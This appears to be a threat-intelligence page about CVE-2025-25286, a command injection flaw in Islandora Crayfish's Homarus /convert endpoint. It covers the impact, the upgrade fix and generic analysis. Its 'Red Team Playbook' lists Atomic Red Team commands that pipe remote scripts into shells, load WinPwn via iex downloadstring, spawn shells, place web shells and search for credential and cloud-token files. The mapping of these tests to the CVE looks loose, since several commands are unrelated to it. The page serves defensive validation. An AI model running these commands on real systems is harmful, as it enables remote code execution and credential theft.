CVE-2025-25286
Overview
This vulnerability is a command injection flaw rooted in unsafe CLI argument interpolation within the Homarus microservice of Islandora Crayfish. Specifically, the Homarus component exposes an FFmpeg-based microservice that improperly handles user input passed to its /convert endpoint, allowing crafted requests to execute arbitrary commands on the host system. The flaw arises from insufficient input validation and lack of proper authentication enforcement in certain configurations.
Vulnerability Description
Crayfish is a collection of Islandora 8 microservices, one of which, Homarus, provides FFmpeg as a microservice. Prior to Crayfish version 4.1.0, remote code execution may be possible in web-accessible installations of Homarus in certain configurations. The issue has been patched in `islandora/crayfish:4.1.0`. Some workarounds are available. The exploit requires making a request against the Homarus's `/convert` endpoint; therefore, the ability to exploit is much reduced if the microservice is not directly accessible from the Internet, so: Prevent general access from the Internet from hitting Homarus. Alternatively or additionally, configure auth in Crayfish to be more strongly required, such that requests with `Authorization` headers that do not validate are rejected before the problematic CLI interpolation occurs.
Impact
An unauthenticated attacker with network access to the Homarus /convert endpoint can execute arbitrary system commands remotely, resulting in full compromise of the host environment. This can lead to data theft, service disruption, or lateral movement within the infrastructure. The vulnerability requires no user interaction and no prior authentication (AV:N/AC:L/PR:N/UI:N), making exploitation straightforward if the microservice is internet-exposed.
Solution
Upgrade Islandora Crayfish to version 4.1.0 or later, where the vulnerability in the Homarus microservice is patched, as detailed in GitHub advisory GHSA-mm6v-68qp-f9fw. If immediate upgrade is not feasible, restrict external network access to the Homarus service to prevent internet exposure and enforce strong authentication requiring valid Authorization headers to block unauthorized requests before CLI interpolation occurs.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability within the Crayfish microservices, specifically in the Homarus component that provides FFmpeg functionality, presents a significant risk due to its potential for remote code execution. This flaw arises from improper handling of user input in web-accessible installations, particularly when requests are made to the `/convert` endpoint. The issue is exacerbated by the fact that the microservice can be configured in a way that allows unvalidated input to be processed, leading to the possibility of executing arbitrary commands on the server. This vulnerability is critical, as it allows an attacker to manipulate the server environment, potentially leading to a full compromise of the affected system.
Exploitation of this vulnerability can occur through various attack vectors, primarily involving direct HTTP requests to the vulnerable endpoint. An attacker with knowledge of the service's configuration can craft a malicious request that exploits the input handling flaw, enabling them to execute arbitrary code on the server. The risk is particularly pronounced in scenarios where the microservice is exposed to the internet without adequate security measures in place. Even in environments where the service is not directly accessible from the internet, an attacker with internal network access could exploit the vulnerability, especially if proper authentication and validation mechanisms are not enforced.
The real-world impact of this vulnerability can be severe, particularly for organizations relying on the Crayfish microservices for media processing and conversion tasks. A successful exploitation could lead to unauthorized access to sensitive data, disruption of services, or even complete control over the affected system. The business risks associated with such an incident include potential data breaches, loss of customer trust, financial repercussions from downtime, and regulatory penalties if sensitive information is compromised. Organizations must recognize that the consequences of an exploit can extend beyond immediate technical issues, affecting their reputation and operational integrity.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, upgrading to the patched version of Crayfish is essential to eliminate the flaw entirely. Additionally, organizations should restrict access to the Homarus microservice by implementing network-level controls that prevent external access. This can be achieved through firewalls or VPNs, ensuring that only trusted internal users can interact with the service. Furthermore, enhancing authentication mechanisms within Crayfish is critical; requests lacking valid `Authorization` headers should be rejected before reaching the vulnerable code. Regular security audits and penetration testing can also help identify potential misconfigurations or weaknesses in the system that could be exploited.
In conclusion, the vulnerability in the Crayfish microservices represents a serious threat that requires immediate attention from affected organizations. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare themselves to defend against exploitation. Implementing robust detection and mitigation strategies will not only protect against this specific vulnerability but also strengthen the overall security posture of the organization in the face of evolving cyber threats.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2025-25286, with new telemetry indicating initial exploitation attempts targeting the Homarus microservice’s `/convert` endpoint. While the overall exploit landscape remains unchanged with no new public exploit code released, the emergence of this activity signals a shift from theoretical risk to active probing in the wild. This development is significant because it confirms adversaries are now testing or attempting to leverage the vulnerability, increasing the likelihood of successful compromise in environments where Crayfish versions prior to 4.1.0 remain deployed and accessible. Consequently, the threat level should be considered elevated from a purely potential risk to an active threat scenario, warranting heightened vigilance in monitoring and detection efforts focused on Homarus microservice traffic. Our telemetry suggests that although exploitation attempts are still limited, the sharp increase in detection activity underscores the need for defenders to reassess exposure and prioritize validation of patching or effective workarounds.
Affected Products
No CPE information available.
Exploits
No exploits found for this CVE.
Threat Feed
1 eventsSighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-25286 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/Islandora/Crayfish/security/advisories/GHSA-mm6v-68qp-f9fw |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/Islandora/Crayfish/commit/64cb4cec688928798cc40e6f0a0e863d7f69fd89 |